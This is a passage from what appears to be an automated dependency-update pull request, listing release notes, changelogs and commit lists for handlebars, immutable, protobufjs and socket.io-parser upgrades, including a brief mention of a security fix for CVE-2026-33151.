href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.7...v4.7.8\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/blob/v4.7.9/release-notes.md\"\u003ehandlebars's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.7.9 - March 26th, 2026\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: enable shell mode for spawn to resolve Windows EINVAL issue - e0137c2\u003c/li\u003e\n\u003cli\u003efix type \u0026quot;RuntimeOptions\u0026quot; also accepting string partials - eab1d14\u003c/li\u003e\n\u003cli\u003efeat(types): set \u003ccode\u003ehash\u003c/code\u003e to be a \u003ccode\u003eRecord\u0026lt;string, any\u0026gt;\u003c/code\u003e - de4414d\u003c/li\u003e\n\u003cli\u003efix non-contiguous program indices - 4512766\u003c/li\u003e\n\u003cli\u003erefactor: rename i to startPartIndex - e497a35\u003c/li\u003e\n\u003cli\u003esecurity: fix security issues - 68d8df5\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.8...v4.7.9\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.7.8 - July 27th, 2023\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMake library compatible with workers (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1894\"\u003e#1894\u003c/a\u003e) - 3d3796c\u003c/li\u003e\n\u003cli\u003eDon't rely on Node.js global object (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1776\"\u003e#1776\u003c/a\u003e) - 2954e7e\u003c/li\u003e\n\u003cli\u003eFix compiling of each block params in strict mode (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1855\"\u003e#1855\u003c/a\u003e) - 30dbf04\u003c/li\u003e\n\u003cli\u003eFix rollup warning when importing Handlebars as ESM - 03d387b\u003c/li\u003e\n\u003cli\u003eFix bundler issue with webpack 5 (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1862\"\u003e#1862\u003c/a\u003e) - c6c6bbb\u003c/li\u003e\n\u003cli\u003eUse https instead of git for mustache submodule - 88ac068\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.7...v4.7.8\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/dce542c9a660048d31f0981ac8a45c08b919bddb\"\u003e\u003ccode\u003edce542c\u003c/code\u003e\u003c/a\u003e v4.7.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/8a41389ba5b2624b6f43a5463d8e2533b843a562\"\u003e\u003ccode\u003e8a41389\u003c/code\u003e\u003c/a\u003e Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2\"\u003e\u003ccode\u003e68d8df5\u003c/code\u003e\u003c/a\u003e Fix security issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/b2a083136b11e1da9f0f47a11f749a9830a49328\"\u003e\u003ccode\u003eb2a0831\u003c/code\u003e\u003c/a\u003e Fix browser tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/9f98c1629834abf8de5a127caff8a2eab03d2c12\"\u003e\u003ccode\u003e9f98c16\u003c/code\u003e\u003c/a\u003e Fix release script\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/45443b4290475dfb7cec32a85d344f12ab345eb9\"\u003e\u003ccode\u003e45443b4\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Improve partial indenting performance\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/8841a5f6d35096aee95d68e1e49636a4cb5c661e\"\u003e\u003ccode\u003e8841a5f\u003c/code\u003e\u003c/a\u003e Fix CI errors with linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/e0137c26f2202593bca7cc25184e733e87d54709\"\u003e\u003ccode\u003ee0137c2\u003c/code\u003e\u003c/a\u003e fix: enable shell mode for spawn to resolve Windows EINVAL issue\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/e914d6037ffb0dd371f7e4823cdb019732ae66d7\"\u003e\u003ccode\u003ee914d60\u003c/code\u003e\u003c/a\u003e Improve rendering performance\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/7de4b41c344a5d702edca93d1841b59642fa32bd\"\u003e\u003ccode\u003e7de4b41\u003c/code\u003e\u003c/a\u003e Upgrade GitHub Actions checkout and setup-node on 4.x branch\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.7...v4.7.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jaylinski\"\u003ejaylinski\u003c/a\u003e, a new releaser for handlebars since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `immutable` from 4.0.0 to 4.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/immutable-js/immutable-js/releases\"\u003eimmutable's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.1.0\u003c/h2\u003e\n\u003cp\u003eDocs: \u003ca href=\"https://immutable-js.com/docs/v4.1.0/\"\u003ehttps://immutable-js.com/docs/v4.1.0/\u003c/a\u003e\nChangelog Doc: \u003ca href=\"https://github.com/immutable-js/immutable-js/blob/fb4701a71ca3b138cb31b6697f047e637780867e/CHANGELOG.md#410---2022-05-23\"\u003ehttps://github.com/immutable-js/immutable-js/blob/fb4701a71ca3b138cb31b6697f047e637780867e/CHANGELOG.md#410---2022-05-23\u003c/a\u003e\nFull Changelog: \u003ca href=\"https://github.com/immutable-js/immutable-js/compare/v4.0.0...v4.1.0\"\u003ehttps://github.com/immutable-js/immutable-js/compare/v4.0.0...v4.1.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/immutable-js/immutable-js/blob/main/CHANGELOG.md\"\u003eimmutable's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.0] - 2022-05-23\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAccept Symbol as Map key. \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1859\"\u003e#1859\u003c/a\u003e by \u003ca href=\"https://github.com/jdeniau\"\u003ejdeniau\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOptimize contructors without arguments \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1887\"\u003e#1887\u003c/a\u003e by \u003ca href=\"https://github.com/marianoguerra\"\u003emarianoguerra\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix Flow removeIn types \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1902\"\u003e#1902\u003c/a\u003e by \u003ca href=\"https://github.com/nifgraup\"\u003enifgraup\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix bug in Record.equals when comparing against Map \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1903\"\u003e#1903\u003c/a\u003e by \u003ca href=\"https://github.com/jmtoung\"\u003ejmtoung\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/f3cb38e545326125b9b1c225ece8b113d3c057d9\"\u003e\u003ccode\u003ef3cb38e\u003c/code\u003e\u003c/a\u003e Release 4.1.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/f83e384fbc7647b3e8b4b73a47088b3bf5af835b\"\u003e\u003ccode\u003ef83e384\u003c/code\u003e\u003c/a\u003e Update Changlog based on recent improvements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/800364678ff9052ce1bb8daeefa15dd515dda602\"\u003e\u003ccode\u003e8003646\u003c/code\u003e\u003c/a\u003e Fix bug in Record.equals when comparing against Map (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1903\"\u003e#1903\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/13b9e4db84c549ac7ecb2f58000808c90317c81f\"\u003e\u003ccode\u003e13b9e4d\u003c/code\u003e\u003c/a\u003e Fix Flow removeIn types (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1902\"\u003e#1902\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/f2dec5aa72c8ce0d893fa1b0eebe67f254ee2034\"\u003e\u003ccode\u003ef2dec5a\u003c/code\u003e\u003c/a\u003e refactor: replace deprecated String.prototype.substr() (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1898\"\u003e#1898\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/10085fb2c9adda34d1d655dbddf55349e69c505a\"\u003e\u003ccode\u003e10085fb\u003c/code\u003e\u003c/a\u003e avoid \u0026quot;undefined\u0026quot; as classname\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/15dbc60fde69e4a97f1d6f1efa08295738103ba9\"\u003e\u003ccode\u003e15dbc60\u003c/code\u003e\u003c/a\u003e prefer word-break to make the fix compatible with doc pages too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/de19537d166aaf9366feee6b2afbe7f672d4ecfb\"\u003e\u003ccode\u003ede19537\u003c/code\u003e\u003c/a\u003e Fixed the docs page\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/4407ad3261502efa48f58c2ae884c8f9c1ef280a\"\u003e\u003ccode\u003e4407ad3\u003c/code\u003e\u003c/a\u003e Fixed the text overflow issue in small devices\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/4d0e9819e509861d0f16a64a4fc0bfdc892563f9\"\u003e\u003ccode\u003e4d0e981\u003c/code\u003e\u003c/a\u003e Accept Symbol as Map key. (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1859\"\u003e#1859\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/immutable-js/immutable-js/compare/v4.0.0...v4.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `protobufjs` from 7.5.4 to 7.6.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/protobufjs/protobuf.js/releases\"\u003eprotobufjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eprotobufjs: v7.6.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.6.0...protobufjs-v7.6.1\"\u003e7.6.1\u003c/a\u003e (2026-05-22)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport misc utility hardening (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2280\"\u003e#2280\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/8a45c13d22ec2d05ab1b7935fcb5331ea59a9cd0\"\u003e8a45c13\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eTreat fixed64 as unsigned in converters (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2266\"\u003e#2266\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/479dfdcc690feb9f71986049d3d38c7a0f979abb\"\u003e479dfdc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eprotobufjs: v7.6.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.9...protobufjs-v7.6.0\"\u003e7.6.0\u003c/a\u003e (2026-05-18)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport BigInt conversions (7.x) (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2258\"\u003e#2258\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/f76924244504b159efe1bb13b154fd17be3c13e7\"\u003ef769242\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eprotobufjs: v7.5.9\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.8...protobufjs-v7.5.9\"\u003e7.5.9\u003c/a\u003e (2026-05-17)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport bundler-safe optional module lookups (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2254\"\u003e#2254\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/0853a625680f9247596b84ef48082b8f4e554797\"\u003e0853a62\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eprotobufjs: v7.5.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.7...protobufjs-v7.5.8\"\u003e7.5.8\u003c/a\u003e (2026-05-12)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport parser hardening to 7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2245\"\u003e#2245\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/54b593ffd960f7fe4b0c448a12542c3de0a0cf26\"\u003e54b593f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eprotobufjs: v7.5.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.6...protobufjs-v7.5.7\"\u003e7.5.7\u003c/a\u003e (2026-05-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRestore first-match namespace lookup (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2236\"\u003e#2236\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/cc7d59559d4e8c533a35218310c67f4a5dda54f5\"\u003ecc7d595\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eprotobufjs: v7.5.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.5...protobufjs-v7.5.6\"\u003e7.5.6\u003c/a\u003e (2026-04-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport input hardening and CLI fixes to 7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2173\"\u003e#2173\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/75392ea1b78bdc4faba027b5db44ad7c50e9c454\"\u003e75392ea\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.5.5\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/protobufjs/protobuf.js/blob/protobufjs-v7.6.1/CHANGELOG.md\"\u003eprotobufjs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.6.0...protobufjs-v7.6.1\"\u003e7.6.1\u003c/a\u003e (2026-05-22)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport misc utility hardening (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2280\"\u003e#2280\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/8a45c13d22ec2d05ab1b7935fcb5331ea59a9cd0\"\u003e8a45c13\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eTreat fixed64 as unsigned in converters (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2266\"\u003e#2266\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/479dfdcc690feb9f71986049d3d38c7a0f979abb\"\u003e479dfdc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.9...protobufjs-v7.6.0\"\u003e7.6.0\u003c/a\u003e (2026-05-18)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport BigInt conversions (7.x) (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2258\"\u003e#2258\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/f76924244504b159efe1bb13b154fd17be3c13e7\"\u003ef769242\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.8...protobufjs-v7.5.9\"\u003e7.5.9\u003c/a\u003e (2026-05-17)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport bundler-safe optional module lookups (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2254\"\u003e#2254\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/0853a625680f9247596b84ef48082b8f4e554797\"\u003e0853a62\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.7...protobufjs-v7.5.8\"\u003e7.5.8\u003c/a\u003e (2026-05-12)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport parser hardening to 7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2245\"\u003e#2245\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/54b593ffd960f7fe4b0c448a12542c3de0a0cf26\"\u003e54b593f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.6...protobufjs-v7.5.7\"\u003e7.5.7\u003c/a\u003e (2026-05-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRestore first-match namespace lookup (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2236\"\u003e#2236\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/cc7d59559d4e8c533a35218310c67f4a5dda54f5\"\u003ecc7d595\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.5...protobufjs-v7.5.6\"\u003e7.5.6\u003c/a\u003e (2026-04-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackport input hardening and CLI fixes to 7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2173\"\u003e#2173\u003c/a\u003e) (\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/75392ea1b78bdc4faba027b5db44ad7c50e9c454\"\u003e75392ea\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/f0b50d2fa1247d6652618190c2d6602e6830b90d\"\u003e\u003ccode\u003ef0b50d2\u003c/code\u003e\u003c/a\u003e chore: release protobufjs-v7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2268\"\u003e#2268\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/8a45c13d22ec2d05ab1b7935fcb5331ea59a9cd0\"\u003e\u003ccode\u003e8a45c13\u003c/code\u003e\u003c/a\u003e fix: Backport misc utility hardening (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2280\"\u003e#2280\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/479dfdcc690feb9f71986049d3d38c7a0f979abb\"\u003e\u003ccode\u003e479dfdc\u003c/code\u003e\u003c/a\u003e fix: Treat fixed64 as unsigned in converters (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2266\"\u003e#2266\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/e30c3341382b504a975d0d83f19170218cb461c3\"\u003e\u003ccode\u003ee30c334\u003c/code\u003e\u003c/a\u003e chore: release protobufjs-v7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2260\"\u003e#2260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/f76924244504b159efe1bb13b154fd17be3c13e7\"\u003e\u003ccode\u003ef769242\u003c/code\u003e\u003c/a\u003e feat: Support BigInt conversions (7.x) (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2258\"\u003e#2258\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/ab3862d133ab9b824f12eab5f993784333543dbf\"\u003e\u003ccode\u003eab3862d\u003c/code\u003e\u003c/a\u003e chore: release protobufjs-v7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2255\"\u003e#2255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/0853a625680f9247596b84ef48082b8f4e554797\"\u003e\u003ccode\u003e0853a62\u003c/code\u003e\u003c/a\u003e fix: Backport bundler-safe optional module lookups (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2254\"\u003e#2254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/d7035f9b7f06210ea343cab1f2f1cc18ee5cc1d6\"\u003e\u003ccode\u003ed7035f9\u003c/code\u003e\u003c/a\u003e chore: release protobufjs-v7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2248\"\u003e#2248\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/54b593ffd960f7fe4b0c448a12542c3de0a0cf26\"\u003e\u003ccode\u003e54b593f\u003c/code\u003e\u003c/a\u003e fix: Backport parser hardening to 7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2245\"\u003e#2245\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/protobufjs/protobuf.js/commit/e88fcea1635f79c414e8a070e164d38ea99e104a\"\u003e\u003ccode\u003ee88fcea\u003c/code\u003e\u003c/a\u003e chore: release protobufjs-v7.x (\u003ca href=\"https://redirect.github.com/protobufjs/protobuf.js/issues/2239\"\u003e#2239\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.5.4...protobufjs-v7.6.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for protobufjs since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `socket.io-parser` from 4.2.4 to 4.2.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/socketio/socket.io/releases\"\u003esocket.io-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esocket.io-parser@4.2.6\u003c/h2\u003e\n\u003cp\u003eThis release includes a fix for \u003ca href=\"https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9\"\u003eCVE-2026-33151\u003c/a\u003e. Please upgrade as soon as possible.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd a limit to the number of binary attachments (\u003ca href=\"https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78\"\u003eb25738c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esocket.io-parser@4.2.5\u003c/h2\u003e\n\u003cp\u003eThis release contains a bump of \u003ccode\u003edebug\u003c/code\u003e from \u003ccode\u003e~4.3.1\u003c/code\u003e to \u003ccode\u003e~4.4.1\u003c/code\u003e.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/522edcdbb89da5eb647abb93c73229d1e91c304f\"\u003e\u003ccode\u003e522edcd\u003c/code\u003e\u003c/a\u003e chore(release): socket.io-parser@4.2.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/3fff7cafa98f1ba5840475b6917c651fe841a943\"\u003e\u003ccode\u003e3fff7ca\u003c/code\u003e\u003c/a\u003e fix(parser): add a limit to the number of binary attachments\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/37aad11417d1020cf51d27a0cf90fa367efd5dc1\"\u003e\u003ccode\u003e37aad11\u003c/code\u003e\u003c/a\u003e fix: cleanup pending acks on timeout to prevent memory leak\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/ba9cd6900d0d84678623cd8e3a42165e922f3fbd\"\u003e\u003ccode\u003eba9cd69\u003c/code\u003e\u003c/a\u003e revert: fix: cleanup pending acks on timeout to prevent memory leak\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/84c2fb78217b6375b38e0b47e0d59d7b1b8431d7\"\u003e\u003ccode\u003e84c2fb7\u003c/code\u003e\u003c/a\u003e chore(release): engine.io@6.6.6\u003c/li\u003e\n\u003cli\u003e\u003ca 